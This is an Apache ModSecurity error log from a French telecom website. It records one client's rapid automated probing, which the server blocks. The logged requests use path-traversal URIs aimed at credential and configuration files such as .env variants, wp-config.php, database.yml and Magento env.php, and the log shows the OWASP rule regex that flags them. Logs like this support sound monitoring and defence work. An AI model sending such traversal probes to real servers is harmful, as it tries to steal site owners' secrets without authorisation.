[Tue May 12 04:51:29.127908 2026] [security2:error] [pid 1730175:tid 1730177] [client 93.123.109.165:42706] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVsHo6NvB9WXx5V-6h8AAAAQA"]
[Tue May 12 04:51:29.209287 2026] [core:error] [pid 1825287:tid 1825305] [client 93.123.109.165:42722] AH10244: invalid URI path (/images../../../.env)
[Tue May 12 04:51:29.695193 2026] [core:error] [pid 1820198:tid 1820211] [client 93.123.109.165:42726] AH10244: invalid URI path (/images../../../../.env)
[Tue May 12 04:51:30.215618 2026] [security2:error] [pid 1825287:tid 1825317] [client 93.123.109.165:42730] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agKVsggpmE1yW0glLdgh4gAAAMw"]
[Tue May 12 04:51:30.215690 2026] [security2:error] [pid 1825287:tid 1825317] [client 93.123.109.165:42730] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agKVsggpmE1yW0glLdgh4gAAAMw"]
[Tue May 12 04:51:30.215831 2026] [security2:error] [pid 1825287:tid 1825317] [client 93.123.109.165:42730] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agKVsggpmE1yW0glLdgh4gAAAMw"]
[Tue May 12 04:51:30.596127 2026] [security2:error] [pid 1825287:tid 1825317] [client 93.123.109.165:42730] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVsggpmE1yW0glLdgh4gAAAMw"]
[Tue May 12 04:51:30.690532 2026] [security2:error] [pid 1730207:tid 1730232] [client 93.123.109.165:42740] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agKVsjue9Sp-pIv_Bb64IwAAAVc"]
[Tue May 12 04:51:30.690608 2026] [security2:error] [pid 1730207:tid 1730232] [client 93.123.109.165:42740] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agKVsjue9Sp-pIv_Bb64IwAAAVc"]
[Tue May 12 04:51:30.690746 2026] [security2:error] [pid 1730207:tid 1730232] [client 93.123.109.165:42740] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agKVsjue9Sp-pIv_Bb64IwAAAVc"]
[Tue May 12 04:51:31.120671 2026] [security2:error] [pid 1730207:tid 1730232] [client 93.123.109.165:42740] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVsjue9Sp-pIv_Bb64IwAAAVc"]
[Tue May 12 04:51:31.219642 2026] [access_compat:error] [pid 1730175:tid 1730197] [client 93.123.109.165:42756] AH01797: client denied by server configuration: /home/tcttelec/public_html/wp-config.php
[Tue May 12 04:51:31.735379 2026] [security2:error] [pid 1730175:tid 1730192] [client 93.123.109.165:42760] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/app/etc/env.php"] [unique_id "agKVs3o6NvB9WXx5V-6h9QAAAQ8"]
[Tue May 12 04:51:31.735563 2026] [security2:error] [pid 1730175:tid 1730192] [client 93.123.109.165:42760] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/app/etc/env.php"] [unique_id "agKVs3o6NvB9WXx5V-6h9QAAAQ8"]
[Tue May 12 04:51:32.128454 2026] [security2:error] [pid 1730175:tid 1730192] [client 93.123.109.165:42760] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVs3o6NvB9WXx5V-6h9QAAAQ8"]
[Tue May 12 04:51:32.234768 2026] [security2:error] [pid 1825287:tid 1825329] [client 93.123.109.165:42762] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/settings.py"] [unique_id "agKVtAgpmE1yW0glLdgh5AAAANc"]
[Tue May 12 04:51:32.234918 2026] [security2:error] [pid 1825287:tid 1825329] [client 93.123.109.165:42762] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/settings.py"] [unique_id "agKVtAgpmE1yW0glLdgh5AAAANc"]
[Tue May 12 04:51:32.624050 2026] [security2:error] [pid 1825287:tid 1825329] [client 93.123.109.165:42762] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVtAgpmE1yW0glLdgh5AAAANc"]
[Tue May 12 04:51:32.719592 2026] [security2:error] [pid 1825179:tid 1825198] [client 93.123.109.165:42778] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/config/database.yml"] [unique_id "agKVtNr1yOh9TvizeziS8wAAAEE"]
[Tue May 12 04:51:32.719739 2026] [security2:error] [pid 1825179:tid 1825198] [client 93.123.109.165:42778] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/config/database.yml"] [unique_id "agKVtNr1yOh9TvizeziS8wAAAEE"]
[Tue May 12 04:51:33.107075 2026] [security2:error] [pid 1825179:tid 1825198] [client 93.123.109.165:42778] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVtNr1yOh9TvizeziS8wAAAEE"]
[Tue May 12 04:51:33.190324 2026] [security2:error] [pid 1730175:tid 1730178] [client 93.123.109.165:42784] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVtXo6NvB9WXx5V-6h9wAAAQE"]
[Tue May 12 04:51:33.190416 2026] [security2:error] [pid 1730175:tid 1730178] [client 93.123.109.165:42784] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVtXo6NvB9WXx5V-6h9wAAAQE"]
[Tue May 12 04:51:33.190579 2026] [security2:error] [pid 1730175:tid 1730178] [client 93.123.109.165:42784] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVtXo6NvB9WXx5V-6h9wAAAQE"]
[Tue May 12 04:51:33.575956 2026] [security2:error] [pid 1730175:tid 1730178] [client 93.123.109.165:42784] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVtXo6NvB9WXx5V-6h9wAAAQE"]
[Tue May 12 04:51:33.691272 2026] [core:error] [pid 1730207:tid 1730224] [client 93.123.109.165:42786] AH10244: invalid URI path (/files../../../.env)
[Tue May 12 04:51:34.155288 2026] [core:error] [pid 1820198:tid 1820216] [client 93.123.109.165:42802] AH10244: invalid URI path (/files../../../../.env)
[Tue May 12 04:51:34.617395 2026] [security2:error] [pid 1730175:tid 1730181] [client 93.123.109.165:42812] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agKVtno6NvB9WXx5V-6h-QAAAQQ"]
[Tue May 12 04:51:34.617468 2026] [security2:error] [pid 1730175:tid 1730181] [client 93.123.109.165:42812] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agKVtno6NvB9WXx5V-6h-QAAAQQ"]
[Tue May 12 04:51:34.617576 2026] [security2:error] [pid 1730175:tid 1730181] [client 93.123.109.165:42812] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agKVtno6NvB9WXx5V-6h-QAAAQQ"]
[Tue May 12 04:51:35.006285 2026] [security2:error] [pid 1730175:tid 1730181] [client 93.123.109.165:42812] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVtno6NvB9WXx5V-6h-QAAAQQ"]
[Tue May 12 04:51:35.093158 2026] [security2:error] [pid 1825287:tid 1825326] [client 93.123.109.165:42818] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agKVtwgpmE1yW0glLdgh5wAAANQ"]
[Tue May 12 04:51:35.093248 2026] [security2:error] [pid 1825287:tid 1825326] [client 93.123.109.165:42818] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agKVtwgpmE1yW0glLdgh5wAAANQ"]
[Tue May 12 04:51:35.093405 2026] [security2:error] [pid 1825287:tid 1825326] [client 93.123.109.165:42818] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agKVtwgpmE1yW0glLdgh5wAAANQ"]
[Tue May 12 04:51:35.484938 2026] [security2:error] [pid 1825287:tid 1825326] [client 93.123.109.165:42818] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVtwgpmE1yW0glLdgh5wAAANQ"]
[Tue May 12 04:51:35.598957 2026] [access_compat:error] [pid 1730207:tid 1730231] [client 93.123.109.165:12070] AH01797: client denied by server configuration: /home/tcttelec/public_html/wp-config.php
[Tue May 12 04:51:36.080437 2026] [security2:error] [pid 1808852:tid 1808859] [client 93.123.109.165:12072] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/app/etc/env.php"] [unique_id "agKVuBfeipD4uoG21FollQAAAAQ"]
[Tue May 12 04:51:36.080662 2026] [security2:error] [pid 1808852:tid 1808859] [client 93.123.109.165:12072] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/app/etc/env.php"] [unique_id "agKVuBfeipD4uoG21FollQAAAAQ"]
[Tue May 12 04:51:36.847128 2026] [security2:error] [pid 1808852:tid 1808859] [client 93.123.109.165:12072] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVuBfeipD4uoG21FollQAAAAQ"]
